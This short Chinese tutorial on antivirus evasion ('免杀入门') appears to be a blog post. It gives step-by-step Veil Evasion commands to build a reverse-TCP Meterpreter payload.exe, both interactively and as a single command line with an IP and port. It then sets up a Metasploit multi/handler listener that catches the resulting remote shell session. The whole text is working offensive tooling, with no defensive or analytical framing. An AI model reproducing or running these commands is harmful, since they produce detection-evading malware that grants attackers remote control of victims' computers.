Veil免杀入门

启动:

1
veil

使用Evasion工具:

1
use Evation

查看支持的攻击载荷:

1
list

选择攻击载荷:

1
use cs/meterpreter/rev_tcp.py

查看配置信息并配置:

1
2
options
set LHOST 192.168.29.134

生成攻击载荷:

1
generate

生成可执行文件payload.exe。

还有另一种生成方式,直接使用命令行生成:

1
veil -t Evasion -p cs/meterpreter/rev_tcp.py --ip 192.168.195.150 --port 4444

在MSF设置监听:

1
2
3
4
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.29.134
exploit

成功启动Meterpreter会话。